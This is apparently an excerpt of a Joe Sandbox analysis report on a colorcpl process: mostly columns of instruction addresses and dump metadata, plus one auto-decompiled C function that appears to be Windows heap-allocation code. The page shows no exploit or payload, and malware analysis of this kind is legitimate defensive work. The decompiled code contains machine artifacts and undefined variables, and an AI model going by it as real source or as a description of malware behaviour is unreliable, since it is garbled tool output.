                                                                                                0x00000000
                                                                                                0x06e7b375
                                                                                                0x06e7b375
                                                                                                0x06e7b375
                                                                                                0x00000000
                                                                                                0x06e7b375
                                                                                                0x00000000
                                                                                                0x06e2d6cc
                                                                                                0x06e2d6d8
                                                                                                0x06e2d6d8
                                                                                                0x06e2d6d8
                                                                                                0x00000000
                                                                                                0x06e2d6c6
                                                                                                0x06e2d6bf
                                                                                                0x00000000
                                                                                                0x06e2d6da
                                                                                                0x06e2d6da
                                                                                                0x06e2d716
                                                                                                0x06e2d71b
                                                                                                0x06e2d720
                                                                                                0x06e2d726
                                                                                                0x06e2d726
                                                                                                0x06e2d72d
                                                                                                0x00000000
                                                                                                0x06e2d733
                                                                                                0x06e2d739
                                                                                                0x06e2d742
                                                                                                0x06e2d750
                                                                                                0x06e2d758
                                                                                                0x06e2d764
                                                                                                0x06e2d776
                                                                                                0x06e2d77a
                                                                                                0x06e2d783
                                                                                                0x06e2d928
                                                                                                0x06e2d92c
                                                                                                0x06e2d93d
                                                                                                0x06e2d944
                                                                                                0x06e2d94f
                                                                                                0x06e2d954
                                                                                                0x06e2d956
                                                                                                0x06e2d95f
                                                                                                0x06e2d961
                                                                                                0x06e2d973
                                                                                                0x06e2d973
                                                                                                0x06e2d956
                                                                                                0x06e2d944
                                                                                                0x06e2d92c
                                                                                                0x06e2d78b
                                                                                                0x06e7b394
                                                                                                0x06e2d791
                                                                                                0x06e2d798
                                                                                                0x06e7b3a3
                                                                                                0x06e7b3bb
                                                                                                0x06e7b3bb
                                                                                                0x06e2d7a5
                                                                                                0x06e2d866
                                                                                                0x06e2d870
                                                                                                0x06e2d884
                                                                                                0x06e2d892
                                                                                                0x06e2d898
                                                                                                0x06e2d89e
                                                                                                0x06e2d8a0
                                                                                                0x06e2d8a6
                                                                                                0x06e2d8ac
                                                                                                0x06e2d8ae
                                                                                                0x06e2d8b4
                                                                                                0x06e2d8b4
                                                                                                0x06e2d8ae
                                                                                                0x06e2d7a5
                                                                                                0x06e2d78b
                                                                                                0x06e2d7b1
                                                                                                0x06e7b3c5
                                                                                                0x06e7b3c5
                                                                                                0x06e2d7c3
                                                                                                0x06e2d7ca
                                                                                                0x06e2d7e5
                                                                                                0x06e2d7eb
                                                                                                0x06e2d8eb
                                                                                                0x06e2d8ed
                                                                                                0x00000000
                                                                                                0x06e2d8f3
                                                                                                0x06e2d8f3
                                                                                                0x06e2d8f3
                                                                                                0x00000000
                                                                                                0x06e2d8ed
                                                                                                0x06e2d7cc
                                                                                                0x06e2d7cc
                                                                                                0x06e2d7d2
                                                                                                0x00000000
                                                                                                0x06e2d7d4
                                                                                                0x06e2d7d4
                                                                                                0x06e2d7d7
                                                                                                0x06e2d7df
                                                                                                0x06e7b3d4
                                                                                                0x06e7b3d9
                                                                                                0x06e7b3dc
                                                                                                0x06e7b3dc
                                                                                                0x06e7b3df
                                                                                                0x06e7b3e2
                                                                                                0x06e7b468
                                                                                                0x06e7b46d
                                                                                                0x06e7b46f
                                                                                                0x06e7b46f
                                                                                                0x06e7b475
                                                                                                0x06e2d8f8
                                                                                                0x06e2d8f9
                                                                                                0x06e2d8fd
                                                                                                0x06e7b3e8
                                                                                                0x06e7b3e8
                                                                                                0x06e7b3eb
                                                                                                0x06e7b3ed
                                                                                                0x00000000
                                                                                                0x06e7b3ef
                                                                                                0x06e7b3ef
                                                                                                0x06e7b3f1
                                                                                                0x06e7b3f4
                                                                                                0x06e7b3fe
                                                                                                0x06e7b404
                                                                                                0x06e7b409
                                                                                                0x06e7b40e
                                                                                                0x06e7b410
                                                                                                0x06e7b410
                                                                                                0x06e7b414
                                                                                                0x06e7b414
                                                                                                0x06e7b41b
                                                                                                0x06e7b420
                                                                                                0x06e7b423
                                                                                                0x06e7b425
                                                                                                0x06e7b427
                                                                                                0x06e7b42a
                                                                                                0x06e7b42d
                                                                                                0x06e7b42d
                                                                                                0x06e7b42a
                                                                                                0x06e7b432
                                                                                                0x06e7b436
                                                                                                0x06e7b438
                                                                                                0x06e7b43b
                                                                                                0x06e7b43b
                                                                                                0x06e7b449
                                                                                                0x06e7b44e
                                                                                                0x06e7b454
                                                                                                0x06e7b458
                                                                                                0x06e7b458
                                                                                                0x06e7b45d
                                                                                                0x00000000
                                                                                                0x06e7b45d
                                                                                                0x06e7b3ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2d7df
                                                                                                0x06e2d7d2
                                                                                                0x06e2d7ca
                                                                                                0x06e7b37c
                                                                                                0x06e7b37e
                                                                                                0x06e7b385
                                                                                                0x06e7b38a
                                                                                                0x00000000
                                                                                                0x06e7b38a
                                                                                                0x06e2d742
                                                                                                0x06e2d7f1
                                                                                                0x06e2d7f8
                                                                                                0x06e7b49b
                                                                                                0x06e7b49b
                                                                                                0x06e2d800
                                                                                                0x06e2d837
                                                                                                0x06e2d843
                                                                                                0x06e2d845
                                                                                                0x06e2d847
                                                                                                0x06e2d84a
                                                                                                0x06e2d84b
                                                                                                0x06e2d84e
                                                                                                0x06e2d857
                                                                                                0x06e2d802
                                                                                                0x06e2d802
                                                                                                0x06e2d80d
                                                                                                0x00000000
                                                                                                0x06e2d818
                                                                                                0x06e2d818
                                                                                                0x06e2d824
                                                                                                0x06e2d831
                                                                                                0x06e7b4a5
                                                                                                0x06e7b4ab
                                                                                                0x06e7b4b3
                                                                                                0x06e7b4b8
                                                                                                0x06e7b4bb
                                                                                                0x00000000
                                                                                                0x06e7b4c1
                                                                                                0x06e7b4c1
                                                                                                0x06e7b4c8
                                                                                                0x00000000
                                                                                                0x06e7b4ce
                                                                                                0x06e7b4d4
                                                                                                0x06e7b4e1
                                                                                                0x06e7b4e3
                                                                                                0x06e7b4e5
                                                                                                0x00000000
                                                                                                0x06e7b4eb
                                                                                                0x06e7b4f0
                                                                                                0x06e7b4f2
                                                                                                0x06e2dac9
                                                                                                0x06e2dacc
                                                                                                0x06e2dacf
                                                                                                0x06e2dad1
                                                                                                0x06e2dd78
                                                                                                0x06e2dd78
                                                                                                0x06e2dcf2
                                                                                                0x00000000
                                                                                                0x06e2dad7
                                                                                                0x06e2dad9
                                                                                                0x06e2dadb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2dae1
                                                                                                0x06e2dae1
                                                                                                0x06e2dae4
                                                                                                0x06e2dae6
                                                                                                0x06e7b4f9
                                                                                                0x06e7b4f9
                                                                                                0x06e7b500
                                                                                                0x06e2daec
                                                                                                0x06e2daec
                                                                                                0x06e2daf5
                                                                                                0x06e2daf8
                                                                                                0x06e2dafb
                                                                                                0x06e2db03
                                                                                                0x06e2db11
                                                                                                0x06e2db16
                                                                                                0x06e2db19
                                                                                                0x06e2db1b
                                                                                                0x06e7b52c
                                                                                                0x06e7b531
                                                                                                0x06e7b534
                                                                                                0x06e2db21
                                                                                                0x06e2db21
                                                                                                0x06e2db24
                                                                                                0x06e2dcd9
                                                                                                0x06e2dce2
                                                                                                0x06e2dce5
                                                                                                0x06e2dd6a
                                                                                                0x06e2dd6d
                                                                                                0x00000000
                                                                                                0x06e2dd73
                                                                                                0x06e7b51a
                                                                                                0x06e7b51c
                                                                                                0x06e7b51f
                                                                                                0x06e7b524
                                                                                                0x00000000
                                                                                                0x06e7b524
                                                                                                0x06e2dce7
                                                                                                0x06e2dce7
                                                                                                0x06e2dce7
                                                                                                0x00000000
                                                                                                0x06e2dce7
                                                                                                0x00000000
                                                                                                0x06e2db2a
                                                                                                0x06e2db2c
                                                                                                0x06e2db31
                                                                                                0x06e2db33
                                                                                                0x06e2db36
                                                                                                0x06e2db39
                                                                                                0x06e2db3b
                                                                                                0x06e2db66
                                                                                                0x06e2db66
                                                                                                0x06e2db3d
                                                                                                0x06e2db3d
                                                                                                0x06e2db3e
                                                                                                0x06e2db46
                                                                                                0x06e2db47
                                                                                                0x06e2db49
                                                                                                0x06e2db4c
                                                                                                0x06e2db53
                                                                                                0x06e2db55
                                                                                                0x06e2db58
                                                                                                0x06e2db5a
                                                                                                0x06e7b50a
                                                                                                0x06e7b50f
                                                                                                0x06e7b512
                                                                                                0x06e2db60
                                                                                                0x06e2db60
                                                                                                0x06e2db63
                                                                                                0x06e2db63
                                                                                                0x00000000
                                                                                                0x06e2db63
                                                                                                0x06e2db5a
                                                                                                0x06e2db3b
                                                                                                0x06e2db24
                                                                                                0x06e2db69
                                                                                                0x06e2db69
                                                                                                0x06e2db6c
                                                                                                0x06e2db6f
                                                                                                0x06e2db74
                                                                                                0x06e7b557
                                                                                                0x06e7b557
                                                                                                0x06e7b55e
                                                                                                0x06e2db7a
                                                                                                0x06e2db7c
                                                                                                0x06e2db7f
                                                                                                0x06e2db82
                                                                                                0x06e2db85
                                                                                                0x00000000
                                                                                                0x06e2db8b
                                                                                                0x06e2db8b
                                                                                                0x06e2db8d
                                                                                                0x06e2db9b
                                                                                                0x06e2db9b
                                                                                                0x06e2db9d
                                                                                                0x06e2dba0
                                                                                                0x06e2dba2
                                                                                                0x06e2dba4
                                                                                                0x06e2dba7
                                                                                                0x06e2dba9
                                                                                                0x06e2dbae
                                                                                                0x06e2dbae
                                                                                                0x06e2dbb1
                                                                                                0x06e2dbb4
                                                                                                0x06e2dbb4
                                                                                                0x06e2dbb7
                                                                                                0x06e2dbba
                                                                                                0x06e2dcd2
                                                                                                0x06e2dcd4
                                                                                                0x00000000
                                                                                                0x06e2dbc0
                                                                                                0x06e2dbc0
                                                                                                0x06e2dbd2
                                                                                                0x06e2dbd7
                                                                                                0x06e2dbda
                                                                                                0x06e2dbdd
                                                                                                0x06e2dbdf
                                                                                                0x00000000
                                                                                                0x06e2dbe5
                                                                                                0x06e2dbe5
                                                                                                0x06e2dbee
                                                                                                0x06e2dbf1
                                                                                                0x06e7b541
                                                                                                0x06e7b544
                                                                                                0x00000000
                                                                                                0x06e7b546
                                                                                                0x06e7b546
                                                                                                0x00000000
                                                                                                0x06e7b546
                                                                                                0x06e2dbf7
                                                                                                0x06e2dbf7
                                                                                                0x06e2dbfd
                                                                                                0x06e2dbfd
                                                                                                0x06e2dbff
                                                                                                0x06e2dc0b
                                                                                                0x06e2dc15
                                                                                                0x06e2dc1b
                                                                                                0x06e2dc1d
                                                                                                0x06e2dc21
                                                                                                0x06e2dc21
                                                                                                0x06e2dc23
                                                                                                0x06e2dc23
                                                                                                0x06e2dc26
                                                                                                0x06e2dc29
                                                                                                0x06e2dc2b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2dc31
                                                                                                0x06e2dc34
                                                                                                0x06e2dc36
                                                                                                0x06e2dcbf
                                                                                                0x06e2dcbf
                                                                                                0x06e2dcc2
                                                                                                0x00000000
                                                                                                0x06e2dc3c
                                                                                                0x06e2dc41
                                                                                                0x06e2dc43
                                                                                                0x00000000
                                                                                                0x06e2dc45
                                                                                                0x06e2dc45
                                                                                                0x06e2dc47
                                                                                                0x00000000
                                                                                                0x06e2dc4d
                                                                                                0x06e2dc4d
                                                                                                0x06e2dc50
                                                                                                0x06e2dc52
                                                                                                0x06e2dc55
                                                                                                0x06e2dcfa
                                                                                                0x06e2dcfe
                                                                                                0x06e2dd08
                                                                                                0x06e2dd0a
                                                                                                0x06e2dd0c
                                                                                                0x00000000
                                                                                                0x06e2dd12
                                                                                                0x06e2dd15
                                                                                                0x06e2dd2d
                                                                                                0x06e2dd2f
                                                                                                0x06e2dd32
                                                                                                0x06e2dd35
                                                                                                0x00000000
                                                                                                0x06e2dd35
                                                                                                0x06e2dc5b
                                                                                                0x06e2dc5b
                                                                                                0x06e2dc5e
                                                                                                0x06e2dc61
                                                                                                0x06e2dc64
                                                                                                0x06e2dc67
                                                                                                0x06e2dc67
                                                                                                0x06e2dc6a
                                                                                                0x06e2dc6c
                                                                                                0x06e2dc8e
                                                                                                0x06e2dc8e
                                                                                                0x06e2dc91
                                                                                                0x06e2dc93
                                                                                                0x06e2dcce
                                                                                                0x06e2dcce
                                                                                                0x06e2dc95
                                                                                                0x06e2dc9c
                                                                                                0x06e2dc6e
                                                                                                0x06e2dc72
                                                                                                0x06e2dc75
                                                                                                0x06e2dc77
                                                                                                0x06e2dc79
                                                                                                0x06e7b551
                                                                                                0x06e7b551
                                                                                                0x00000000
                                                                                                0x06e2dc7f
                                                                                                0x06e2dc7f
                                                                                                0x06e2dc81
                                                                                                0x00000000
                                                                                                0x06e2dc83
                                                                                                0x06e2dc86
                                                                                                0x06e2dc88
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2dc88
                                                                                                0x06e2dc81
                                                                                                0x06e2dc79
                                                                                                0x06e2dc6c
                                                                                                0x06e2dc55
                                                                                                0x06e2dc47
                                                                                                0x06e2dc43
                                                                                                0x00000000
                                                                                                0x06e2dc36
                                                                                                0x06e2dc23
                                                                                                0x00000000
                                                                                                0x06e2dbff
                                                                                                0x06e2dbf1
                                                                                                0x06e2dbdf
                                                                                                0x06e2db8f
                                                                                                0x06e2db92
                                                                                                0x06e2db95
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2db95
                                                                                                0x06e2db8d
                                                                                                0x06e2db85
                                                                                                0x06e2db74
                                                                                                0x06e2dc9f
                                                                                                0x06e2dca2
                                                                                                0x06e2dcb0
                                                                                                0x06e2dcb0
                                                                                                0x06e2dad1
                                                                                                0x06e7b4e5
                                                                                                0x06e7b4c8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2d831
                                                                                                0x06e2d80d
                                                                                                0x00000000
                                                                                                0x06e2d800
                                                                                                0x06e7b47f
                                                                                                0x06e7b485
                                                                                                0x00000000
                                                                                                0x06e7b485
                                                                                                0x06e2d665
                                                                                                0x06e2d652
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4ef6f56c03e4ae811b2187a9286d2da0c1a2c10983fb66af68f89da5ec31273e
                                                                                                • Instruction ID: cfc801dbbe3e946c4a7e1c253bb40a04c6a34d0efbd8fb968da9bfd2f4e4aba6
                                                                                                • Opcode Fuzzy Hash: 4ef6f56c03e4ae811b2187a9286d2da0c1a2c10983fb66af68f89da5ec31273e
                                                                                                • Instruction Fuzzy Hash: 0AE1D530E0036ADFEBA4DF24CD84BA9B7B7BF45308F0421A9DA1997290D7749985CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E3B236 Relevance: .3, Instructions: 305COMMONCrypto
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 86%
                                                                                                			E06E3B236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E06E3B477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = E06EBCB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E06E40678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E06E59660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E06E59660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E06E59660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E06E4174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E06E4138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E06E37D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										E06ED138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E06E37D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E06ED1582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E06E37D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E06E37D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									E06ED1582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E06E37D50();
								__eflags = _t129;
								if(_t129 != 0) {
									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									E06ECFEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										E06ECFA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E06E399BF(__ecx, _t87,  &_v16, 0);
					E06E3A830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							E06ECFA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}






































                                                                                                0x06e3b23f
                                                                                                0x06e3b246
                                                                                                0x06e3b249
                                                                                                0x06e3b24b
                                                                                                0x06e3b251
                                                                                                0x06e3b258
                                                                                                0x06e3b262
                                                                                                0x06e3b2b2
                                                                                                0x06e3b2b6
                                                                                                0x06e3b456
                                                                                                0x06e3b456
                                                                                                0x06e3b45a
                                                                                                0x06e82912
                                                                                                0x06e82914
                                                                                                0x06e82916
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e8291f
                                                                                                0x06e82921
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82927
                                                                                                0x00000000
                                                                                                0x06e82927
                                                                                                0x06e3b460
                                                                                                0x06e3b460
                                                                                                0x06e3b462
                                                                                                0x06e3b464
                                                                                                0x06e8292e
                                                                                                0x06e82931
                                                                                                0x06e8293f
                                                                                                0x06e82945
                                                                                                0x06e82945
                                                                                                0x06e82931
                                                                                                0x00000000
                                                                                                0x06e3b464
                                                                                                0x06e3b2bc
                                                                                                0x06e3b2bf
                                                                                                0x06e3b2c5
                                                                                                0x06e3b2c8
                                                                                                0x06e3b2ca
                                                                                                0x06e827af
                                                                                                0x06e827af
                                                                                                0x06e3b2d0
                                                                                                0x06e3b2d7
                                                                                                0x06e3b437
                                                                                                0x06e3b2dd
                                                                                                0x06e3b2dd
                                                                                                0x06e3b2dd
                                                                                                0x06e3b2e3
                                                                                                0x06e3b2e5
                                                                                                0x06e3b43e
                                                                                                0x06e3b443
                                                                                                0x06e827b6
                                                                                                0x06e827b6
                                                                                                0x06e3b443
                                                                                                0x06e3b2f5
                                                                                                0x06e3b2fa
                                                                                                0x06e3b2fd
                                                                                                0x06e3b2ff
                                                                                                0x06e3b46f
                                                                                                0x06e3b46f
                                                                                                0x06e3b30a
                                                                                                0x06e3b30f
                                                                                                0x06e3b310
                                                                                                0x06e3b315
                                                                                                0x06e3b31b
                                                                                                0x06e3b31c
                                                                                                0x06e3b321
                                                                                                0x06e3b322
                                                                                                0x06e3b329
                                                                                                0x06e3b32b
                                                                                                0x06e3b32d
                                                                                                0x06e827c2
                                                                                                0x06e827c2
                                                                                                0x06e827c5
                                                                                                0x06e827c7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e827c9
                                                                                                0x06e827cb
                                                                                                0x06e827ce
                                                                                                0x06e827d0
                                                                                                0x06e827d2
                                                                                                0x06e827d2
                                                                                                0x06e827d5
                                                                                                0x06e827db
                                                                                                0x06e827e0
                                                                                                0x06e827e1
                                                                                                0x06e827e6
                                                                                                0x06e827e7
                                                                                                0x06e827ee
                                                                                                0x06e827f0
                                                                                                0x06e827f2
                                                                                                0x00000000
                                                                                                0x06e827f4
                                                                                                0x06e827f4
                                                                                                0x00000000
                                                                                                0x06e827f4
                                                                                                0x06e827f2
                                                                                                0x06e827f7
                                                                                                0x06e827f9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e827ff
                                                                                                0x00000000
                                                                                                0x06e3b333
                                                                                                0x06e3b333
                                                                                                0x06e3b336
                                                                                                0x06e3b336
                                                                                                0x06e3b33c
                                                                                                0x06e3b341
                                                                                                0x06e3b344
                                                                                                0x06e3b44e
                                                                                                0x06e3b44e
                                                                                                0x06e3b34a
                                                                                                0x06e3b34d
                                                                                                0x06e3b353
                                                                                                0x06e3b358
                                                                                                0x06e3b359
                                                                                                0x06e3b35e
                                                                                                0x06e3b35f
                                                                                                0x06e3b366
                                                                                                0x06e3b368
                                                                                                0x06e3b36a
                                                                                                0x06e828f2
                                                                                                0x06e828fe
                                                                                                0x06e82903
                                                                                                0x06e82903
                                                                                                0x00000000
                                                                                                0x06e3b370
                                                                                                0x06e3b38c
                                                                                                0x06e3b391
                                                                                                0x06e3b393
                                                                                                0x06e8280a
                                                                                                0x06e8280a
                                                                                                0x06e3b399
                                                                                                0x06e3b39b
                                                                                                0x00000000
                                                                                                0x06e3b3a1
                                                                                                0x06e3b3a1
                                                                                                0x06e3b3a6
                                                                                                0x06e3b3b0
                                                                                                0x06e3b3b2
                                                                                                0x06e8281d
                                                                                                0x06e3b3b8
                                                                                                0x06e3b3b8
                                                                                                0x06e3b3b8
                                                                                                0x06e3b3ba
                                                                                                0x06e3b3bd
                                                                                                0x06e82824
                                                                                                0x06e8282a
                                                                                                0x06e82831
                                                                                                0x06e82841
                                                                                                0x06e8284b
                                                                                                0x06e8284d
                                                                                                0x06e82858
                                                                                                0x06e82858
                                                                                                0x06e82858
                                                                                                0x06e82870
                                                                                                0x06e82870
                                                                                                0x06e82831
                                                                                                0x06e3b3c3
                                                                                                0x06e3b3c8
                                                                                                0x06e3b3d2
                                                                                                0x06e3b3d4
                                                                                                0x06e82883
                                                                                                0x06e3b3da
                                                                                                0x06e3b3da
                                                                                                0x06e3b3da
                                                                                                0x06e3b3dc
                                                                                                0x06e3b3df
                                                                                                0x06e8288f
                                                                                                0x06e82891
                                                                                                0x06e8289c
                                                                                                0x06e8289c
                                                                                                0x06e8289c
                                                                                                0x06e828b4
                                                                                                0x06e828b4
                                                                                                0x06e3b3e5
                                                                                                0x06e3b3ea
                                                                                                0x06e3b3ec
                                                                                                0x06e828c7
                                                                                                0x06e3b3f2
                                                                                                0x06e3b3f2
                                                                                                0x06e3b3f2
                                                                                                0x06e3b3f7
                                                                                                0x06e3b3fa
                                                                                                0x06e828d9
                                                                                                0x06e828d9
                                                                                                0x06e3b400
                                                                                                0x06e3b407
                                                                                                0x06e3b40a
                                                                                                0x06e3b40f
                                                                                                0x06e3b413
                                                                                                0x06e3b41f
                                                                                                0x06e3b424
                                                                                                0x06e3b426
                                                                                                0x06e828e3
                                                                                                0x06e828e8
                                                                                                0x06e828e8
                                                                                                0x06e3b426
                                                                                                0x06e3b42f
                                                                                                0x00000000
                                                                                                0x06e3b42f
                                                                                                0x06e3b39b
                                                                                                0x06e3b36a
                                                                                                0x06e3b264
                                                                                                0x06e3b264
                                                                                                0x06e3b279
                                                                                                0x06e3b27f
                                                                                                0x06e3b287
                                                                                                0x06e3b28c
                                                                                                0x06e3b290
                                                                                                0x06e3b29c
                                                                                                0x06e3b2a3
                                                                                                0x06e827a0
                                                                                                0x06e827a5
                                                                                                0x06e827a5
                                                                                                0x06e3b2a3
                                                                                                0x06e3b2a9
                                                                                                0x06e3b2b1
                                                                                                0x06e3b2b1

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
